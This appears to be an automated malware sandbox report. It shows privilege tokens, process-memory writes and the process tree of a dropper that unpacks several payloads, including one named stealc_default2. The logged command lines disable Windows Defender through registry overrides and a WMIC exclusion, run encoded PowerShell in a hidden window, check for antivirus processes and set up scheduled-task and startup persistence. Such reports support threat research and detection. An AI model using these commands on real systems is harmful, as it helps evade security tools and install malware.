description pid Process Token: SeDebugPrivilege 2724 6InNj3SOTk.exe Token: SeBackupPrivilege 2724 6InNj3SOTk.exe Token: SeSecurityPrivilege 2724 6InNj3SOTk.exe Token: SeSecurityPrivilege 2724 6InNj3SOTk.exe Token: SeSecurityPrivilege 2724 6InNj3SOTk.exe Token: SeSecurityPrivilege 2724 6InNj3SOTk.exe Token: SeDebugPrivilege 952 bhh9YfYYwa.exe Token: SeDebugPrivilege 2324 RegAsm.exe Token: SeDebugPrivilege 2812 penis.exe Token: SeBackupPrivilege 2812 penis.exe Token: SeSecurityPrivilege 2812 penis.exe Token: SeSecurityPrivilege 2812 penis.exe Token: SeSecurityPrivilege 2812 penis.exe Token: SeSecurityPrivilege 2812 penis.exe Token: SeDebugPrivilege 2704 tasklist.exe Token: SeDebugPrivilege 1256 tasklist.exe Token: SeDebugPrivilege 2764 bundle.exe Token: SeDebugPrivilege 276 powershell.exe Token: SeDebugPrivilege 868 powershell.exe Token: SeIncreaseQuotaPrivilege 2544 WMIC.exe Token: SeSecurityPrivilege 2544 WMIC.exe Token: SeTakeOwnershipPrivilege 2544 WMIC.exe Token: SeLoadDriverPrivilege 2544 WMIC.exe Token: SeSystemProfilePrivilege 2544 WMIC.exe Token: SeSystemtimePrivilege 2544 WMIC.exe Token: SeProfSingleProcessPrivilege 2544 WMIC.exe Token: SeIncBasePriorityPrivilege 2544 WMIC.exe Token: SeCreatePagefilePrivilege 2544 WMIC.exe Token: SeBackupPrivilege 2544 WMIC.exe Token: SeRestorePrivilege 2544 WMIC.exe Token: SeShutdownPrivilege 2544 WMIC.exe Token: SeDebugPrivilege 2544 WMIC.exe Token: SeSystemEnvironmentPrivilege 2544 WMIC.exe Token: SeRemoteShutdownPrivilege 2544 WMIC.exe Token: SeUndockPrivilege 2544 WMIC.exe Token: SeManageVolumePrivilege 2544 WMIC.exe Token: 33 2544 WMIC.exe Token: 34 2544 WMIC.exe Token: 35 2544 WMIC.exe Token: SeDebugPrivilege 2312 acentric.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 236 powershell.EXE Token: SeDebugPrivilege 1944 powershell.EXE Token: SeDebugPrivilege 1660 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1536 WMIC.exe Token: SeIncreaseQuotaPrivilege 1536 WMIC.exe Token: SeSecurityPrivilege 1536 WMIC.exe Token: SeTakeOwnershipPrivilege 1536 WMIC.exe Token: SeLoadDriverPrivilege 1536 WMIC.exe Token: SeSystemtimePrivilege 1536 WMIC.exe Token: SeBackupPrivilege 1536 WMIC.exe Token: SeRestorePrivilege 1536 WMIC.exe Token: SeShutdownPrivilege 1536 WMIC.exe Token: SeSystemEnvironmentPrivilege 1536 WMIC.exe Token: SeUndockPrivilege 1536 WMIC.exe Token: SeManageVolumePrivilege 1536 WMIC.exe Token: SeDebugPrivilege 2600 powershell.EXE Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1604 WMIC.exe Token: SeIncreaseQuotaPrivilege 1604 WMIC.exe Token: SeSecurityPrivilege 1604 WMIC.exe Token: SeTakeOwnershipPrivilege 1604 WMIC.exe Token: SeLoadDriverPrivilege 1604 WMIC.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2336 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe 2188 Nework.exe 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2940 Waters.pif 2940 Waters.pif 2940 Waters.pif -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2336 wrote to memory of 2056 2336 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe 30 PID 2336 wrote to memory of 2056 2336 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe 30 PID 2336 wrote to memory of 2056 2336 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe 30 PID 2336 wrote to memory of 2056 2336 3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe 30 PID 2056 wrote to memory of 2252 2056 axplong.exe 32 PID 2056 wrote to memory of 2252 2056 axplong.exe 32 PID 2056 wrote to memory of 2252 2056 axplong.exe 32 PID 2056 wrote to memory of 2252 2056 axplong.exe 32 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2252 wrote to memory of 2324 2252 gold.exe 34 PID 2056 wrote to memory of 2820 2056 axplong.exe 37 PID 2056 wrote to memory of 2820 2056 axplong.exe 37 PID 2056 wrote to memory of 2820 2056 axplong.exe 37 PID 2056 wrote to memory of 2820 2056 axplong.exe 37 PID 2820 wrote to memory of 2724 2820 crypteda.exe 38 PID 2820 wrote to memory of 2724 2820 crypteda.exe 38 PID 2820 wrote to memory of 2724 2820 crypteda.exe 38 PID 2820 wrote to memory of 2724 2820 crypteda.exe 38 PID 2820 wrote to memory of 952 2820 crypteda.exe 39 PID 2820 wrote to memory of 952 2820 crypteda.exe 39 PID 2820 wrote to memory of 952 2820 crypteda.exe 39 PID 2820 wrote to memory of 952 2820 crypteda.exe 39 PID 2056 wrote to memory of 2188 2056 axplong.exe 41 PID 2056 wrote to memory of 2188 2056 axplong.exe 41 PID 2056 wrote to memory of 2188 2056 axplong.exe 41 PID 2056 wrote to memory of 2188 2056 axplong.exe 41 PID 2188 wrote to memory of 2828 2188 Nework.exe 42 PID 2188 wrote to memory of 2828 2188 Nework.exe 42 PID 2188 wrote to memory of 2828 2188 Nework.exe 42 PID 2188 wrote to memory of 2828 2188 Nework.exe 42 PID 2056 wrote to memory of 2080 2056 axplong.exe 43 PID 2056 wrote to memory of 2080 2056 axplong.exe 43 PID 2056 wrote to memory of 2080 2056 axplong.exe 43 PID 2056 wrote to memory of 2080 2056 axplong.exe 43 PID 2056 wrote to memory of 2052 2056 axplong.exe 46 PID 2056 wrote to memory of 2052 2056 axplong.exe 46 PID 2056 wrote to memory of 2052 2056 axplong.exe 46 PID 2056 wrote to memory of 2052 2056 axplong.exe 46 PID 2056 wrote to memory of 2704 2056 axplong.exe 47 PID 2056 wrote to memory of 2704 2056 axplong.exe 47 PID 2056 wrote to memory of 2704 2056 axplong.exe 47 PID 2056 wrote to memory of 2704 2056 axplong.exe 47 PID 2704 wrote to memory of 1840 2704 needmoney.exe 48 PID 2704 wrote to memory of 1840 2704 needmoney.exe 48 PID 2704 wrote to memory of 1840 2704 needmoney.exe 48 PID 2704 wrote to memory of 1840 2704 needmoney.exe 48 PID 2704 wrote to memory of 1840 2704 needmoney.exe 48 PID 2704 wrote to memory of 1840 2704 needmoney.exe 48 PID 2704 wrote to memory of 1840 2704 needmoney.exe 48 PID 2704 wrote to memory of 1840 2704 needmoney.exe 48 PID 2704 wrote to memory of 1840 2704 needmoney.exe 48 PID 2056 wrote to memory of 2812 2056 axplong.exe 49 PID 2056 wrote to memory of 2812 2056 axplong.exe 49 PID 2056 wrote to memory of 2812 2056 axplong.exe 49
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe"C:\Users\Admin\AppData\Local\Temp\3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Users\Admin\AppData\Roaming\6InNj3SOTk.exe"C:\Users\Admin\AppData\Roaming\6InNj3SOTk.exe"5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Users\Admin\AppData\Roaming\bhh9YfYYwa.exe"C:\Users\Admin\AppData\Roaming\bhh9YfYYwa.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2828
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2080
-
-
C:\Users\Admin\AppData\Local\Temp\1000129001\2.exe"C:\Users\Admin\AppData\Local\Temp\1000129001\2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2052 -
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2332
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2728
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exeC:\Users\Admin\AppData\Local\Temp\svchost015.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1840
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2412
-
-
C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:576 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1660 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"6⤵PID:1924
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"6⤵PID:2984
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6076986⤵
- System Location Discovery: System Language Discovery
PID:1020
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "MaskBathroomCompositionInjection" Participants6⤵PID:2268
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q6⤵PID:896
-
-
C:\Users\Admin\AppData\Local\Temp\607698\Waters.pifWaters.pif Q6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2940
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵PID:2428
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2732 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2736
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\7zS4B91.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\7zS4D46.tmp\Install.exe.\Install.exe /sdidaXH "385121" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
PID:2348 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵PID:3004
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"8⤵
- Indirect Command Execution
PID:1252 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
- System Location Discovery: System Language Discovery
PID:2652 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵
- System Location Discovery: System Language Discovery
PID:2392
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"8⤵
- Indirect Command Execution
PID:2936 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
- System Location Discovery: System Language Discovery
PID:2300 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:1652
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"8⤵
- Indirect Command Execution
PID:2576 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
- System Location Discovery: System Language Discovery
PID:884 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:1388
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"8⤵
- Indirect Command Execution
PID:2148 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
- System Location Discovery: System Language Discovery
PID:2872 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵
- System Location Discovery: System Language Discovery
PID:2352
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2696 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵PID:2988
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:276 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force11⤵PID:1472
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"7⤵
- Indirect Command Execution
PID:1664 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:2520
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:868 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmbXFarNlpbNUcjZUs" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\MYkdETq.exe\" NE /SvdidN 385121 /S" /V1 /F7⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 5927⤵
- Loads dropped DLL
- Program crash
PID:2412
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F2⤵
- System Location Discovery: System Language Discovery
PID:2636 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit2⤵
- Drops startup file
PID:1548
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {ECACD0D0-A139-4215-AD14-73DAF2D955DB} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]1⤵PID:328
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:236 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1524
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:944
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1976
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2364
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2684
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:448
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {40D7808E-9DD2-433E-8180-4D32F932009B} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\MYkdETq.exeC:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\MYkdETq.exe NE /SvdidN 385121 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1176 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- System Location Discovery: System Language Discovery
PID:2984 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2988 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2696
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:2548
-
-
-
-
